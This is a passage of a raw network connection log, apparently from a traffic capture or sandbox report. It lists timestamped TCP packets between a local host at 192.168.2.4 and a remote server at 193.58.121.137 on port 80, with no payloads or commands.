Jan 3, 2025 20:47:44.861620903 CET	80	49744	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:44.861639023 CET	80	49744	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:44.861649990 CET	80	49744	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.037791014 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.042717934 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.042789936 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.042929888 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.046518087 CET	49744	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.047702074 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.051625967 CET	80	49744	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.051682949 CET	49744	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.241437912 CET	49746	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.246351957 CET	80	49746	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.246417999 CET	49746	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.246521950 CET	49746	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.251254082 CET	80	49746	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.388192892 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.393228054 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.393240929 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.393249989 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.393260002 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.393268108 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.393309116 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.393336058 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.393346071 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.393358946 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.393393040 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.393580914 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.393593073 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.393634081 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.393698931 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.393959999 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.398118019 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.398129940 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.398175001 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.398180962 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.398185015 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.398201942 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.398217916 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.398238897 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.398263931 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.441288948 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.441416979 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.486572981 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.486711979 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.491605997 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.491615057 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.491666079 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.491674900 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.491715908 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.491724014 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.491761923 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.491770029 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.491780043 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.491833925 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.491926908 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.491944075 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.491990089 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.492060900 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.492069006 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.492079973 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.492153883 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.492162943 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.492214918 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.492223978 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.591322899 CET	49746	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.596204996 CET	80	49746	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.596215010 CET	80	49746	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.596223116 CET	80	49746	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.711139917 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.903739929 CET	80	49746	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.925276041 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:45.925333977 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:45.996280909 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:46.036164045 CET	80	49746	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:46.039634943 CET	49746	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:46.122119904 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:46.235290051 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:46.235354900 CET	49746	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:46.235594034 CET	49747	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:46.240277052 CET	80	49745	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:46.240354061 CET	80	49747	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:46.240407944 CET	49745	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:46.240432978 CET	49747	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:46.240562916 CET	80	49746	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:46.240603924 CET	49746	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:46.241578102 CET	49747	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:46.246340990 CET	80	49747	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:46.590970993 CET	49747	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:46.595873117 CET	80	49747	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:46.595886946 CET	80	49747	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:46.595902920 CET	80	49747	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:46.747986078 CET	49749	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:46.752989054 CET	80	49749	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:46.753077030 CET	49749	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:46.753181934 CET	49749	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:46.757946014 CET	80	49749	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:46.864732027 CET	80	49747	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:46.918994904 CET	49747	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:46.992018938 CET	80	49747	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:47.108764887 CET	49749	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:47.113629103 CET	80	49749	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:47.113730907 CET	80	49749	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:47.122121096 CET	49747	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:47.159123898 CET	49747	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:47.159462929 CET	49750	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:47.164073944 CET	80	49747	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:47.164119959 CET	49747	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:47.164256096 CET	80	49750	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:47.164318085 CET	49750	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:47.164484978 CET	49750	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:47.169270992 CET	80	49750	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:47.454494953 CET	80	49749	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:47.512861013 CET	49750	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:47.517863989 CET	80	49750	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:47.517874956 CET	80	49750	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:47.517887115 CET	80	49750	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:47.584089041 CET	80	49749	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:47.584140062 CET	49749	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:47.854372978 CET	80	49750	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:47.919183969 CET	49750	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:47.984031916 CET	80	49750	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:48.107573986 CET	49749	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:48.109783888 CET	49750	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:48.112636089 CET	80	49749	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:48.114701033 CET	80	49750	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:48.114732027 CET	49749	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:48.115509033 CET	49750	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:48.115797043 CET	49752	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:48.120604992 CET	80	49752	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:48.120728016 CET	49752	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:48.121233940 CET	49752	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:48.125986099 CET	80	49752	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:48.492074013 CET	49752	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:48.498383045 CET	80	49752	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:48.498395920 CET	80	49752	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:48.498404980 CET	80	49752	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:48.761467934 CET	80	49752	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:48.810292006 CET	49752	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:48.896807909 CET	80	49752	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:49.113426924 CET	80	49752	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:49.113470078 CET	49752	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:49.652935982 CET	49752	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:49.653374910 CET	49753	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:49.702909946 CET	80	49753	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:49.702990055 CET	49753	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:49.713507891 CET	49753	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:49.713602066 CET	80	49752	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:49.713654995 CET	49752	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:49.718354940 CET	80	49753	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:50.059931993 CET	49753	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:50.064991951 CET	80	49753	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:50.065005064 CET	80	49753	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:50.065016985 CET	80	49753	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:50.400473118 CET	80	49753	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:50.529957056 CET	80	49753	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:50.530041933 CET	49753	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:50.653284073 CET	49754	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:50.658221960 CET	80	49754	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:50.658303022 CET	49754	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:50.658536911 CET	49754	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:50.663325071 CET	80	49754	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:51.012890100 CET	49754	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:51.017858982 CET	80	49754	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:51.017873049 CET	80	49754	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:51.017880917 CET	80	49754	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:51.311006069 CET	80	49754	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:51.407742977 CET	49754	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:51.445928097 CET	80	49754	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:51.528444052 CET	49754	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.080445051 CET	49755	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.080549002 CET	49754	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.085419893 CET	80	49755	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:52.085496902 CET	49755	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.085819006 CET	80	49754	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:52.085866928 CET	49754	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.086200953 CET	49755	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.091049910 CET	80	49755	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:52.435069084 CET	49755	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.440135956 CET	80	49755	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:52.440150023 CET	80	49755	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:52.440160990 CET	80	49755	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:52.592927933 CET	49756	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.593456984 CET	49755	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.598289013 CET	80	49756	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:52.598349094 CET	49756	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.598539114 CET	49756	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.599092960 CET	80	49755	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:52.599148035 CET	49755	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.603969097 CET	80	49756	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:52.723404884 CET	49758	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.728231907 CET	80	49758	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:52.728293896 CET	49758	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.728409052 CET	49758	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.733198881 CET	80	49758	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:52.950612068 CET	49756	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:52.956633091 CET	80	49756	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:52.957252026 CET	80	49756	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:53.075546980 CET	49758	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:53.080555916 CET	80	49758	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:53.080569983 CET	80	49758	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:53.080581903 CET	80	49758	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:53.307080030 CET	80	49756	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:53.381468058 CET	80	49758	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:53.419094086 CET	49756	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:53.434843063 CET	49758	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:53.443871021 CET	80	49756	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:53.524153948 CET	80	49758	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:53.528568983 CET	49756	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:53.575315952 CET	49758	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:53.660984993 CET	49756	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:53.660984993 CET	49758	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:53.661370993 CET	49759	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:53.666042089 CET	80	49756	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:53.666227102 CET	80	49759	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:53.666249990 CET	80	49758	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:53.666269064 CET	49756	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:53.666320086 CET	49758	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:53.666337013 CET	49759	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:53.666493893 CET	49759	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:53.671238899 CET	80	49759	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:54.016398907 CET	49759	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:54.021419048 CET	80	49759	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:54.021430969 CET	80	49759	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:54.021440029 CET	80	49759	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:54.301357031 CET	80	49759	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:54.340941906 CET	49759	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:54.428219080 CET	80	49759	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:54.481570959 CET	49759	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:54.704879045 CET	49759	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:54.705832005 CET	49760	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:54.767959118 CET	80	49760	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:54.768831968 CET	80	49759	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:54.768913984 CET	49759	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:54.768927097 CET	49760	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:54.770334959 CET	49760	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:54.775126934 CET	80	49760	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:55.122303963 CET	49760	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:55.127331972 CET	80	49760	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:55.127343893 CET	80	49760	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:55.127355099 CET	80	49760	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:55.410794020 CET	80	49753	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:55.410861015 CET	49753	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:55.517940998 CET	80	49760	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:55.559695005 CET	49760	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:55.661448956 CET	80	49760	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:55.716079950 CET	49760	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:55.790642977 CET	49760	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:55.790898085 CET	49761	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:55.795794964 CET	80	49760	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:55.795809984 CET	80	49761	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:55.795906067 CET	49760	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:55.795947075 CET	49761	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:55.796092987 CET	49761	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:55.800832033 CET	80	49761	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:56.153820038 CET	49761	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:56.158930063 CET	80	49761	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:56.158943892 CET	80	49761	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:56.158953905 CET	80	49761	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:56.444598913 CET	80	49761	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:56.497345924 CET	49761	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:56.575614929 CET	80	49761	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:56.622217894 CET	49761	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:56.710623980 CET	49763	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:56.715487003 CET	80	49763	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:56.715585947 CET	49763	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:56.715717077 CET	49763	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:56.720464945 CET	80	49763	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:57.080581903 CET	49763	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:57.085484028 CET	80	49763	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:57.085640907 CET	80	49763	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:57.085649967 CET	80	49763	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:57.352978945 CET	80	49763	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:57.403503895 CET	49763	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:57.482217073 CET	80	49763	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:57.528490067 CET	49763	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:58.488270998 CET	49769	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:58.488478899 CET	49763	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:58.492667913 CET	49770	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:58.493060112 CET	80	49769	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:58.493541956 CET	80	49763	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:58.493608952 CET	49763	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:58.493624926 CET	49769	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:58.493887901 CET	49769	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:58.497448921 CET	80	49770	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:58.497647047 CET	49770	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:58.498054028 CET	49770	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:58.498735905 CET	80	49769	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:58.502820015 CET	80	49770	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:58.841133118 CET	49769	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:58.845990896 CET	80	49769	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:58.846065998 CET	80	49769	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:58.856779099 CET	49770	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:58.861710072 CET	80	49770	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:58.861718893 CET	80	49770	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:58.861727953 CET	80	49770	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:59.229657888 CET	80	49769	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:59.258640051 CET	80	49770	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:59.278480053 CET	49769	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:59.309725046 CET	49770	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:59.360146999 CET	80	49769	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:59.360868931 CET	49770	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:59.365931988 CET	80	49770	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:59.365994930 CET	49770	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:59.403477907 CET	49769	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:59.479387999 CET	49769	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:59.479644060 CET	49778	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:59.484405994 CET	80	49769	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:59.484447002 CET	80	49778	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:59.484498978 CET	49769	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:59.484527111 CET	49778	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:59.484647989 CET	49778	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:59.489413023 CET	80	49778	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:59.841916084 CET	49778	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:47:59.846904039 CET	80	49778	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:59.846919060 CET	80	49778	193.58.121.137	192.168.2.4
Jan 3, 2025 20:47:59.846926928 CET	80	49778	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:00.343364954 CET	80	49778	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:00.387870073 CET	49778	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:00.476895094 CET	80	49778	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:00.528501987 CET	49778	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:01.050909996 CET	49778	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:01.053973913 CET	49787	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:01.058866978 CET	80	49787	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:01.058932066 CET	49787	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:01.059067965 CET	49787	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:01.063832998 CET	80	49787	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:01.403775930 CET	49787	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:01.408677101 CET	80	49787	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:01.408689976 CET	80	49787	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:01.408699036 CET	80	49787	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:01.456707954 CET	80	49761	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:01.456796885 CET	49761	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:01.712651014 CET	80	49787	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:01.762872934 CET	49787	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:01.851799965 CET	80	49787	193.58.121.137	192.168.2.4
Jan 3, 2025 20:48:01.903512955 CET	49787	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:01.977528095 CET	49787	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:01.977816105 CET	49793	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:48:01.982677937 CET	80	49793	193.58.121.137	192.168.2.4
